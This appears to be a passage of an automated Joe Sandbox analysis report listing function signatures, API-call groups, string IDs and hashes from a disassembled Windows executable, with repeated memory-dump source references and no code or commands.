                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
                                                                            • String ID:
                                                                            • API String ID: 179993514-0
                                                                            • Opcode ID: 3c8edd0cfd7487a94cc2a97b78295d5ab7e6e6e303c53cb727e1080bae55b3ee
                                                                            • Instruction ID: 04019c7f3b76831695287d9f11c1d0a40305a2d78e3e52617193f0cbcc5d130c
                                                                            • Opcode Fuzzy Hash: 3c8edd0cfd7487a94cc2a97b78295d5ab7e6e6e303c53cb727e1080bae55b3ee
                                                                            • Instruction Fuzzy Hash: E2F03121F18B5143F7647B71AC58E39AA92BF88784FC45034D90E42B54DF3CE5A68A20
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: FreeFromProgTask$BlanketConnectConnection2CreateInitializeInstanceOpenProxyQueryRegistrySecurityValuelstrcmpi
                                                                            • String ID: NULL Pointer assignment
                                                                            • API String ID: 1653399731-2785691316
                                                                            • Opcode ID: 069250944c4b5cae8d9ba027fcc4337deb9b93f0114834e2bf5349901f1538a4
                                                                            • Instruction ID: 002531799da1455f5ff9119c2b8eaa806fd41ecbf4e69e26100e565ede8cb169
                                                                            • Opcode Fuzzy Hash: 069250944c4b5cae8d9ba027fcc4337deb9b93f0114834e2bf5349901f1538a4
                                                                            • Instruction Fuzzy Hash: 75B16832A08B418AE720EF75D4809ADBBA0FB847D8F940136EE4D57A58DF38E556CB50
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharUpper
                                                                            • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                            • API String ID: 3964851224-769500911
                                                                            • Opcode ID: e386f8ab1d92894773db659cf3300b3f053d0d71c47061b204d1c004bb332453
                                                                            • Instruction ID: fbf3410e5e5821167ccf7324dbd1de6a5b798a89a1d5b23246afe381dae2f065
                                                                            • Opcode Fuzzy Hash: e386f8ab1d92894773db659cf3300b3f053d0d71c47061b204d1c004bb332453
                                                                            • Instruction Fuzzy Hash: 0C41FC22F1DA1381EE786F358445D79E6D5AB14BD4BD80A31CA5D837D4EE3DE8638320
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: _invalid_parameter_noinfo
                                                                            • String ID: #$E$O
                                                                            • API String ID: 3215553584-248080428
                                                                            • Opcode ID: 475178099990ac0353bf962476b95ad540ed5abada18ffefe6575b5c91291a80
                                                                            • Instruction ID: 251f06f058babccacac9b3f37c603943d9364d5e1b9837b1eb3ae6425927d4c5
                                                                            • Opcode Fuzzy Hash: 475178099990ac0353bf962476b95ad540ed5abada18ffefe6575b5c91291a80
                                                                            • Instruction Fuzzy Hash: 2641A422A15F51A4EF61AF3198409BDABA4BF54BD8F488435EE4D07798DF3CD462C720
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: FileFullNamePath$MoveOperationlstrcmpiwcscat
                                                                            • String ID: \*.*
                                                                            • API String ID: 3196045410-1173974218
                                                                            • Opcode ID: 3d99fb60beaa909b16133a9bcb21b6d4d5eca463ec33ffbc4784a3084b69c118
                                                                            • Instruction ID: 9c3b05a0b720d99f788c981d22ac8190104b2e2148aee2d2c1a6503722f29cbb
                                                                            • Opcode Fuzzy Hash: 3d99fb60beaa909b16133a9bcb21b6d4d5eca463ec33ffbc4784a3084b69c118
                                                                            • Instruction Fuzzy Hash: 00412F22A1864395EB30EB34D8415FDAB64FF957C8FC40031DA4D53A99EF28DA2BC760
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$ClassName
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 787153527-1403004172
                                                                            • Opcode ID: 9c499cc6f02fa48c3ac9cb94422f7fd03db359100d80c7e843bbe6ca230b4a14
                                                                            • Instruction ID: a5dda765e48fcb982e9d8c8d1db7298f625951e59d8c3a66365b91ac97d528ea
                                                                            • Opcode Fuzzy Hash: 9c499cc6f02fa48c3ac9cb94422f7fd03db359100d80c7e843bbe6ca230b4a14
                                                                            • Instruction Fuzzy Hash: 8D31C022A1864282EA30FB25E4519B9AB60FF85FD0FD44231EA5D47B95DF3CE527C720
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                            • String ID:
                                                                            • API String ID: 3113390036-3916222277
                                                                            • Opcode ID: fe032384e3ae49ab6650df1e9e36687832eb56e7d0293f7a573cd5f7425b5e8f
                                                                            • Instruction ID: e530f7e8da48f5883a9977a9a429264587185bdc853146c052fcf2ee86601aa6
                                                                            • Opcode Fuzzy Hash: fe032384e3ae49ab6650df1e9e36687832eb56e7d0293f7a573cd5f7425b5e8f
                                                                            • Instruction Fuzzy Hash: CD31C622A1C68296FB70AF32A450E6EAB90FB84BC0F946131DE4D57B55DF3CD4238760
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                            • String ID: SysAnimate32
                                                                            • API String ID: 4146253029-1011021900
                                                                            • Opcode ID: 6e660b33d6e4a84e6fd34bbeb61245ead5be6ef8b5cba7022a4468a5647c8c45
                                                                            • Instruction ID: 77c5742d638d24cfb0e2143b2991c5ad1c49bf1db00568f67ccbb55b7c124feb
                                                                            • Opcode Fuzzy Hash: 6e660b33d6e4a84e6fd34bbeb61245ead5be6ef8b5cba7022a4468a5647c8c45
                                                                            • Instruction Fuzzy Hash: C0319E32608781CAE770AF24E444B6AB7A0FB85B90F904639DA5D47B88DF3CD452CB10
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                            • API String ID: 4061214504-1276376045
                                                                            • Opcode ID: ec043f9b6fed639492fe08c1f7567e430e68234150a908e2993f018ebf9edeab
                                                                            • Instruction ID: 128e1e3c5aaf38db113fbecb7fdb60ca187a9a7da8e532be23283b86e8e67fb9
                                                                            • Opcode Fuzzy Hash: ec043f9b6fed639492fe08c1f7567e430e68234150a908e2993f018ebf9edeab
                                                                            • Instruction Fuzzy Hash: F9F04471A19A4281EE64BB21E844A79ABA1EF88BD0FC41035E90F46654DF3CD466C710
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLasthtonsinet_ntoa
                                                                            • String ID:
                                                                            • API String ID: 2227131780-0
                                                                            • Opcode ID: de181184d64454d02e59459dbd5a64f19f6960c4302c7388feffadca35e45e4d
                                                                            • Instruction ID: f1566dd3c612bc3985045cfc75b17402fa5d9b64356db02dba5b9e4b44ec21f1
                                                                            • Opcode Fuzzy Hash: de181184d64454d02e59459dbd5a64f19f6960c4302c7388feffadca35e45e4d
                                                                            • Instruction Fuzzy Hash: 54A1B122A0864286EB30FB3AD851ABDAF90FF85BD4F844131DE5E47795DE3CD5268720
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Process$CloseCountersCurrentHandleOpen
                                                                            • String ID:
                                                                            • API String ID: 3488606520-0
                                                                            • Opcode ID: 33f71eaf96c05a677f4ff7f9555289fe157d7a24ae1f8fdeb2073595f7ad5bbf
                                                                            • Instruction ID: c02cbec2216bc1b93a87d974a092a226fcd8eaaa4867c25595acd2383d005e82
                                                                            • Opcode Fuzzy Hash: 33f71eaf96c05a677f4ff7f9555289fe157d7a24ae1f8fdeb2073595f7ad5bbf
                                                                            • Instruction Fuzzy Hash: 02818E32B0879189EB24AF368455AADABA0BB45FD4F888035DE0D17B96CF7CD522C750
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                            • String ID:
                                                                            • API String ID: 3451389628-0
                                                                            • Opcode ID: 15617fa1357ecb3d846dc9695c1cd625fdbfbd656e758f324f53fc3991267fb6
                                                                            • Instruction ID: 2d312ada924abb201d905da22c1b8e00d2b0101ca81c0fdead78183b43d93409
                                                                            • Opcode Fuzzy Hash: 15617fa1357ecb3d846dc9695c1cd625fdbfbd656e758f324f53fc3991267fb6
                                                                            • Instruction Fuzzy Hash: 80713F32B18A418AEB20EF75D495BBC6B60FF84788F814531EA0D57A56DF38D126C364
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                                            • String ID:
                                                                            • API String ID: 3659116390-0
                                                                            • Opcode ID: 565e37f08fcc29d8b24d7793246010796331880618d15c7c8224c4ccd3a000f5
                                                                            • Instruction ID: dba97af10a11936b8883149a3e82dbee0985c4c083206bf99cc613da35c3ef9c
                                                                            • Opcode Fuzzy Hash: 565e37f08fcc29d8b24d7793246010796331880618d15c7c8224c4ccd3a000f5
                                                                            • Instruction Fuzzy Hash: 0E51D232A14A5199E721DB75E4847ACBBB0FB48BD8F448135CE4E47B98DF38D166C720
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                            • String ID:
                                                                            • API String ID: 3740051246-0
                                                                            • Opcode ID: 298953672724a5207909a795614b2829bd7d7b99ba66be59e73fbf309c8ee550
                                                                            • Instruction ID: 7243a2bb92a25bc210a1ff699dcc277dc37473d83e28712d6515607ca6076e9a
                                                                            • Opcode Fuzzy Hash: 298953672724a5207909a795614b2829bd7d7b99ba66be59e73fbf309c8ee550
                                                                            • Instruction Fuzzy Hash: 51619F22A18A8285EB20EB75D494BBDBB70FF847C4F804131EA4D07A66DF7CD566C760
                                                                            APIs
                                                                            • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7978CC2BF), ref: 00007FF7978CD176
                                                                            • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7978CC2BF), ref: 00007FF7978CD217
                                                                            • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7978CC2BF), ref: 00007FF7978CD236
                                                                            • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7978CC2BF), ref: 00007FF7978CD281
                                                                            • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF7978CC2BF), ref: 00007FF7978CD2A0
                                                                              • Part of subcall function 00007FF797854120: WideCharToMultiByte.KERNEL32 ref: 00007FF797854160
                                                                              • Part of subcall function 00007FF797854120: WideCharToMultiByte.KERNEL32 ref: 00007FF79785419C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                            • String ID:
                                                                            • API String ID: 666041331-0
                                                                            • Opcode ID: c3fd7c48fc9f9c2f8ece9fb323df923621d5475b61cd025522e48c4117cd4c81
                                                                            • Instruction ID: 86b79f68bf193422a2a008669864eb0caed7069f33c79616ea68bc57ee113f6d
                                                                            • Opcode Fuzzy Hash: c3fd7c48fc9f9c2f8ece9fb323df923621d5475b61cd025522e48c4117cd4c81
                                                                            • Instruction Fuzzy Hash: E1512A32A04B0685EB20FF76D8949ACBB64FB99BC4B954036DE5E47355DF38E452C320
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$Clear$ChangeInitType
                                                                            • String ID:
                                                                            • API String ID: 4136290138-0
                                                                            • Opcode ID: 5bf158a84cb56ccb7168b4d37c167f5e8b54303454597cac92653ddc8f5d8736
                                                                            • Instruction ID: c7d87312cfaead8c16c62e73d47201db92eebe46ddf6c5ea06e3e752056a0a52
                                                                            • Opcode Fuzzy Hash: 5bf158a84cb56ccb7168b4d37c167f5e8b54303454597cac92653ddc8f5d8736
                                                                            • Instruction Fuzzy Hash: 37517577625A54D2DB20EF25D484BAD77B8FB84B80F828122CB4D43768EF39E069C710
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfile$SectionWrite$String
                                                                            • String ID:
                                                                            • API String ID: 2832842796-0
                                                                            • Opcode ID: 92b8df45978e0c3636dffb45c437ab285b3a52bf771fcff91e61f9d6d21807be
                                                                            • Instruction ID: 23ad59fbebad10822be72d3fc01d7c57a379bfbf25d91b6316064d957bd48050
                                                                            • Opcode Fuzzy Hash: 92b8df45978e0c3636dffb45c437ab285b3a52bf771fcff91e61f9d6d21807be
                                                                            • Instruction Fuzzy Hash: BA51FD26A18A4682EB24EF26D490569BB60FB88FD4F548432EF8E47766CF3CD452C750
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AsyncState$ClientCursorScreen
                                                                            • String ID:
                                                                            • API String ID: 4210589936-0
                                                                            • Opcode ID: 66afa1c94deaf905156041cf676ffe3a2b02e9b0039980c06c23d4dff2918920
                                                                            • Instruction ID: 4141cb17db7f42c06a41854d9702a689010560a86a42012cf5e2a852bf5bf7b5
                                                                            • Opcode Fuzzy Hash: 66afa1c94deaf905156041cf676ffe3a2b02e9b0039980c06c23d4dff2918920
                                                                            • Instruction Fuzzy Hash: C9511632B056819BE764EF35D444969BB60FB467D4F400231EA5E477D5CF38E4A28710
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc
                                                                            • String ID:
                                                                            • API String ID: 190572456-0
                                                                            • Opcode ID: a18f96543d52060ea1fb4eaea9751658dcb69330229f7bbe75e5b271c8b8e6e3
                                                                            • Instruction ID: 87b3c8d65814f8c97ddc696360849c364ae86b4fc4e41fe1c677848d9c654609
                                                                            • Opcode Fuzzy Hash: a18f96543d52060ea1fb4eaea9751658dcb69330229f7bbe75e5b271c8b8e6e3
                                                                            • Instruction Fuzzy Hash: 1541D721B19E0291FA31BF26A800975EF99FF447E4FA98535DD1D4B358EE3CE4128314
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
